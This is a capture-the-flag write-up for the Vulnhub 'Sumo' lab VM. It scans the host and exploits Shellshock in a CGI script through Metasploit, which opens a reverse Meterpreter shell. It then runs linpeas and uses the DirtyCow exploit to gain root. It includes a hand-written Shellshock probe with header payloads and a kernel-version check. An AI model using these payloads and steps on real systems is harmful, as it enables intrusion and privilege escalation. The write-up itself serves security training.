Sumo Machine (Vulnhub, Easy)

Warning: This content is intended exclusively for educational and ethical purposes. Misuse of the tools and techniques presented here may be illegal and harmful. You are strongly advised to act responsibly and to respect all applicable laws and regulations.
This write-up was completed successfully without resorting to other people's write-ups. To carry out this analysis, open sources and vulnerability scripts were consulted, thus ensuring the originality and authenticity of the work. Also, an LLM (AI) was used only for this paragraph 😂

Scanning phase

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 17:41 WEST
Nmap scan report for 10.0.2.15
Host is up (0.000091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 08:00:27:1E:DF:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.13 seconds

Ports 22 and 80 are open; let's pay the web page a visit.

It doesn't seem to offer anything special, so let's try dirb and gobuster.

Dirb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul  7 18:04:29 2025
URL_BASE: http://10.0.2.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.docx,.xlsx,.pptx,.pdf,.jpg.jpeg,.png,.gif,.zip,.html,) | (.txt)(.docx)(.xlsx)(.pptx)(.pdf)(.jpg.jpeg)(.png)(.gif)(.zip)(.html) [NUM = 10]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.2.15/ ----
+ http://10.0.2.15/index.html (CODE:200|SIZE:177)                                                                  
                                                                                                                   
-----------------
END_TIME: Mon Jul  7 18:04:48 2025
DOWNLOADED: 46120 - FOUND: 1
                                                                                                                    

That yields nothing useful as far as the most common extensions go.

Let's try without any extension: just a walk looking for the most common directories or files besides the index.html we already know about.

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul  7 18:09:26 2025
URL_BASE: http://10.0.2.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.2.15/ ----
+ http://10.0.2.15/cgi-bin/ (CODE:403|SIZE:285)                                                                    
+ http://10.0.2.15/index (CODE:200|SIZE:177)                                                                       
+ http://10.0.2.15/index.html (CODE:200|SIZE:177)                                                                  
+ http://10.0.2.15/server-status (CODE:403|SIZE:290)                                                               
                                                                                                                   
-----------------
END_TIME: Mon Jul  7 18:09:28 2025
DOWNLOADED: 4612 - FOUND: 4

Here we have a few things to look at. Let's start:

Forbidden

You don't have permission to access /cgi-bin/ on this server.
Apache/2.2.22 (Ubuntu) Server at 10.0.2.15 Port 80

index and index.html (both 200, both 177 bytes) may contain something of interest; nikto confirms below that /index is simply index.html served through MultiViews.

Forbidden

You don't have permission to access /server-status/ on this server.
Apache/2.2.22 (Ubuntu) Server at 10.0.2.15 Port 80

Nikto

We run a nikto scan (there is a cgi-bin, so let's take a good look at it):

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.2.15
+ Target Hostname:    10.0.2.15
+ Target Port:        80
+ Start Time:         2025-07-18 21:30:40 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 18:55:10 2020. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /cgi-bin/test: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /cgi-bin/test.sh: Uncommon header '93e4r0-cve-2014-6278' found, with contents: true.
+ /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
+ /cgi-bin/test/test.cgi: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8909 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2025-07-18 21:31:00 (GMT1) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Well, we have a more than apparent vulnerability that we can exploit:

/cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability.
CVE-2014-6271 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)

Metasploit

Now, in Metasploit, let's search for the vulnerability:

Metasploit tip: You can pivot connections over sessions started with the 
ssh_login modules
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.4.69-dev                          ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 432 post       ]
+ -- --=[ 1672 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search shellshock
Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2     \_ target: Linux x86                             .                .          .      .
   3     \_ target: Linux x86_64                          .                .          .      .
   4   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   5   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   6   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   7   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   8   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   9   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   10  exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   11  exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   12    \_ target: Linux x86                             .                .          .      .
   13    \_ target: Linux x86_64                          .                .          .      .
   14  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   15  exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution

Exploitation phase

Let's exploit this vulnerability. The module has an excellent rank, and the bug is simple: Apache mod_cgi hands every request header to the CGI script as an environment variable (User-Agent becomes HTTP_USER_AGENT, for instance), and a vulnerable bash that imports an environment value of the form `() { ... };` keeps parsing past the function body and executes whatever commands follow it. The result is command execution as the web server user, which is how the module gets us onto the system.
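Before handing this to the module, it is worth seeing the mechanism by hand. The block below is an added example, not code from the original write-up, from nikto or from Metasploit: it reproduces the check nikto performed above (an injected command that emits an extra response header, which is why nikto reported an "uncommon header"), first against the local bash and then over HTTP. The marker string, the function names and the X-Shellshock header name are my own choices; the local test assumes a bash binary is installed, and the curl wrapper assumes network access to the target.

```shell
#!/bin/sh
# Added example for this write-up; not code from the original post, nikto or
# Metasploit. Names, marker and the X-Shellshock header are my own choices.

# 1. The bug itself, against the local bash: a function definition imported
#    from the environment is executed past its closing brace by a vulnerable
#    bash. Prints nothing and returns 1 on a patched bash (or if bash is absent).
local_bash_is_vulnerable() {
  env x='() { :; }; echo SHELLSHOCK' bash -c 'true' 2>/dev/null | grep -q SHELLSHOCK
}

# 2. The HTTP side. mod_cgi exports request headers to the script's environment
#    (User-Agent -> HTTP_USER_AGENT), so the same text goes into a header.
#    The injected command prints a header line, which Apache relays to the
#    client ahead of the script's own output; that is what nikto keyed on above.
shellshock_header_6271() {   # $1 = marker; original bug (CVE-2014-6271)
  printf '() { :; }; echo "X-Shellshock: %s"' "$1"
}
shellshock_header_6278() {   # $1 = marker; bypass of the first patch (CVE-2014-6278)
  printf '() { _; } >_[$($())] { echo "X-Shellshock: %s"; }' "$1"
}

# 3. Decide from a raw "curl -i" capture. Only the header block (everything up
#    to the first blank line) counts: a marker in the body proves nothing,
#    since a page could simply reflect the User-Agent it received.
response_has_marker() {   # $1 = raw response text, $2 = marker
  printf '%s\n' "$1" | sed '/^[[:space:]]*$/q' | grep -qi "^x-shellshock: *$2"
}

# 4. Live probe (needs network access to the target; not exercised offline).
probe_cgi() {   # $1 = URL of the CGI, e.g. http://10.0.2.15/cgi-bin/test.sh
  url=$1; marker=${2:-ss$$}
  for hdr in "$(shellshock_header_6271 "$marker")" "$(shellshock_header_6278 "$marker")"; do
    resp=$(curl -s -i -A "$hdr" "$url") || continue
    if response_has_marker "$resp" "$marker"; then
      echo "VULNERABLE $url  (User-Agent: $hdr)"
      return 0
    fi
  done
  echo "no marker echoed by $url"
  return 1
}
```

Run `probe_cgi http://10.0.2.15/cgi-bin/test.sh` from the attacking box. The 6278 form is the one to try when a server carries only the first, incomplete bash patch; the module's CVE option exists for the same reason. On a patched bash the local test prints nothing and the function returns false.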

msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 10.0.2.15
rhosts => 10.0.2.15
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/test.sh
targeturi => /cgi-bin/test.sh

This is what show options looks like afterwards:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting   Required  Description
   ----            ---------------   --------  -----------
   CMD_MAX_LENGTH  2048              yes       CMD max line length
   CVE             CVE-2014-6271     yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent        yes       HTTP header to use
   METHOD          GET               yes       HTTP method to use
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS          10.0.2.15         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPATH           /bin              yes       Target PATH for binaries used by the CmdStager
   RPORT           80                yes       The target port (TCP)
   SSL             false             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/test.sh  yes       Path to CGI script
   TIMEOUT         5                 yes       HTTP read response timeout (seconds)
   URIPATH                           no        The URI to use for this exploit (default is random)
   VHOST                             no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.5         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

We launch the exploit, wait for the result and check which system we are on with sysinfo:

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.0.2.5:4444 
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.0.2.15
[*] Meterpreter session 2 opened (10.0.2.5:4444 -> 10.0.2.15:41273) at 2025-07-19 16:57:20 +0100
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Once in, we find that the directory we landed in is not writable, so let's look for one that is.

pwd
/usr/lib/cgi-bin
cd /
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
selinux
srv
sys
tmp
usr
var
vmlinuz
ls -l
total 80
drwxr-xr-x   2 root root  4096 May 11  2020 bin
drwxr-xr-x   3 root root  4096 May 11  2020 boot
drwxr-xr-x  14 root root  4020 Jul 18 13:04 dev
drwxr-xr-x  83 root root  4096 Jul 18 13:04 etc
drwxr-xr-x   3 root root  4096 May 11  2020 home
lrwxrwxrwx   1 root root    33 May 11  2020 initrd.img -> /boot/initrd.img-3.2.0-23-generic
drwxr-xr-x  18 root root  4096 May 11  2020 lib
drwxr-xr-x   2 root root  4096 May 11  2020 lib64
drwx------   2 root root 16384 May 11  2020 lost+found
drwxr-xr-x   4 root root  4096 May 11  2020 media
drwxr-xr-x   3 root root  4096 May 11  2020 mnt
drwxr-xr-x   2 root root  4096 May 11  2020 opt
dr-xr-xr-x 106 root root     0 Jul 18 13:04 proc
drwx------   3 root root  4096 May 13  2020 root
drwxr-xr-x  14 root root   520 Jul 18 13:04 run
drwxr-xr-x   2 root root  4096 May 11  2020 sbin
drwxr-xr-x   2 root root  4096 Mar  5  2012 selinux
drwxr-xr-x   2 root root  4096 May 11  2020 srv
drwxr-xr-x  13 root root     0 Jul 18 13:04 sys
drwxrwxrwt   2 root root  4096 Jul 18 19:45 tmp
drwxr-xr-x  10 root root  4096 May 11  2020 usr
drwxr-xr-x  12 root root  4096 May 13  2020 var
lrwxrwxrwx   1 root root    29 May 11  2020 vmlinuz -> boot/vmlinuz-3.2.0-23-generic

I have to say I went directory by directory, looking at contents and permissions. And then...

ls -l tmp
total 92
-rwxrwxrwx 1 www-data www-data   207 Jul 18 19:45 NTmyM
-rwxrwxrwx 1 www-data www-data   207 Jul 18 14:21 PJIPQ
-rwxrwxrwx 1 www-data www-data   207 Jul 18 19:16 PxdJV
-rwxrwxrwx 1 www-data www-data   207 Jul 18 19:05 RWUAI
-rwxr-xr-x 1 www-data www-data 42824 Jul 18 18:39 bak

None of these files contain anything useful, but now that we have a writable directory we can use a utility that reports vulnerabilities from inside the system.

Linpeas.sh

One of the tools I like most once I have read, write and execute access is this script, which reports every vulnerability it finds by analysing the system from inside.

First I downloaded it on Kali and saved it to a file, to upload it later to our writable directory:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  933k  100  933k    0     0   920k      0  0:00:01  0:00:01 --:--:--  920k

We upload it from meterpreter to our directory:

meterpreter > upload linpeas.sh /tmp
[*] Uploading  : /home/kali/linpeas.sh -> /tmp/linpeas.sh
[*] Completed  : /home/kali/linpeas.sh -> /tmp/linpeas.sh

Let's check what we have in /tmp/:

meterpreter > ls
Listing: /tmp
=============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100777/rwxrwxrwx  207     fil   2025-07-19 03:45:47 +0100  NTmyM
100777/rwxrwxrwx  207     fil   2025-07-18 22:21:51 +0100  PJIPQ
100777/rwxrwxrwx  207     fil   2025-07-19 03:16:49 +0100  PxdJV
100777/rwxrwxrwx  207     fil   2025-07-19 03:05:09 +0100  RWUAI
100755/rwxr-xr-x  42824   fil   2025-07-19 02:39:37 +0100  bak
100755/rwxr-xr-x  956174  fil   2025-07-19 03:57:28 +0100  linpeas.sh

We make sure it has execute permission and run it...

cd /tmp
chmod +rwx linpeas.sh
ls -l
total 1028
-rw-r--r-- 1 www-data www-data   5442 Jul 18 16:57 34839.py
-rwxrwxrwx 1 www-data www-data    207 Jul 18 19:45 NTmyM
-rwxrwxrwx 1 www-data www-data    207 Jul 18 14:21 PJIPQ
-rwxrwxrwx 1 www-data www-data    207 Jul 18 19:16 PxdJV
-rwxrwxrwx 1 www-data www-data    207 Jul 18 19:05 RWUAI
-rwxr-xr-x 1 www-data www-data  42824 Jul 18 18:39 bak
-rwxr-xr-x 1 www-data www-data  13782 Jul 18 18:39 c0w
-rw-r--r-- 1 www-data www-data   4388 Jul 18 18:39 c0w.c
-rwxr-xr-x 1 www-data www-data 956174 Jul 18 19:57 linpeas.sh

The number of findings is enormous (naturally: this is a vulnerability lab). Let's investigate the first one, which linpeas reports through its embedded linux-exploit-suggester:

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
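The hit above is a version-string match: linux-exploit-suggester compares the distribution and kernel release with the tags shown (ubuntu=12.04 with a 3.2.0 kernel, here). As an added example, not part of the original write-up and not les.sh's own code, the POSIX shell function below does the same triage from a `uname -r` string against the upstream affected window, which I take as 2.6.22 up to the fix released in 4.8.3 (and in the 4.7.9 and 4.4.26 stable releases of the same day); the function names and sample strings are mine. The caveat a practitioner needs is in the comments: distribution kernels backport the fix without changing the upstream version, so a hit here is a lead to confirm against the installed kernel package and the vendor advisory, never proof, and a vendor-patched box is still flagged.

```shell
#!/bin/sh
# Added example; not from the original write-up and not les.sh's own code.
# Version-string triage for CVE-2016-5195 (Dirty COW) from a `uname -r` value.
# Assumed window: bug present since 2.6.22; fixed upstream in 4.8.3 and in the
# 4.7.9 / 4.4.26 stable releases. Distro kernels (RHEL, Ubuntu 12.04's
# 3.2.0-xx.yy, ...) backport the fix without changing these numbers, so a hit
# is a lead to confirm against the vendor advisory, never proof.

# Collapse the leading MAJOR.MINOR[.PATCH] into one integer so ranges compare
# with plain arithmetic: 3.2.0-23-generic -> 3002000, 4.4 -> 4004000.
# Returns 1 (and prints 0) for something that is not a kernel release string.
kernel_num() {
  case "$1" in
    [0-9]*.[0-9]*) ;;
    *) echo 0; return 1 ;;
  esac
  set -- $(printf '%s\n' "$1" | sed -E 's/^([0-9]+)\.([0-9]+)(\.([0-9]+))?.*/\1 \2 \4/')
  echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# True (0) when the upstream version sits inside the affected window.
# Returns 2 when the string could not be parsed.
dirtycow_version_in_range() {
  v=$(kernel_num "$1") || return 2
  [ "$v" -ge 2006022 ] || return 1          # older than 2.6.22: bug not there yet
  case "$v" in
    4004*) [ "$v" -lt 4004026 ] ;;          # 4.4.y stable: fixed in 4.4.26
    4007*) [ "$v" -lt 4007009 ] ;;          # 4.7.y stable: fixed in 4.7.9
    *)     [ "$v" -lt 4008003 ] ;;          # everything else: fixed in 4.8.3
  esac
}

# One-line verdict for the running kernel, or for the string given as $1.
dirtycow_triage() {
  rel=${1:-$(uname -r)}
  if dirtycow_version_in_range "$rel"; then
    echo "$rel: inside the upstream Dirty COW window; check the installed kernel package against the vendor advisory"
  else
    echo "$rel: outside the upstream Dirty COW window"
  fi
}
```

On this box `dirtycow_triage` reports 3.2.0-23-generic as inside the window, the same verdict les.sh gave; on an Ubuntu 12.04 host that had received the vendor fix it would say exactly the same, which is why the package revision, not the version string, is what settles it.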

Running c0w.c

Upload it with meterpreter:

meterpreter > upload c0w.c /tmp
[*] Uploading  : /home/kali/c0w.c -> /tmp/c0w.c
[*] Completed  : /home/kali/c0w.c -> /tmp/c0w.c

Drop into a shell, compile it (the source file and the output binary are c0w.c and c0w, matching the warning and the run below) and execute it:

gcc -pthread c0w.c -o c0w
c0w.c: In function 'main':
c0w.c:110:3: warning: format '%x' expects argument of type 'unsigned int', but argument 2 has type 'void *' [-Wformat]
./c0w
                                
   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 31d2e000

ptrace 0

                                

It looks like the privilege escalation worked: we run /usr/bin/passwd and voilà! Keep in mind what the exploit just told us: it overwrote /usr/bin/passwd with its own root-shell payload and kept the original at /tmp/bak. Once you have the root shell, copy it back (cp /tmp/bak /usr/bin/passwd), otherwise nobody on the box can change a password any more.

/usr/bin/passwd
cd /root
ls
root.txt
cat root.txt
{Sum0-SunCSR-2020_r001}
		
whoami
root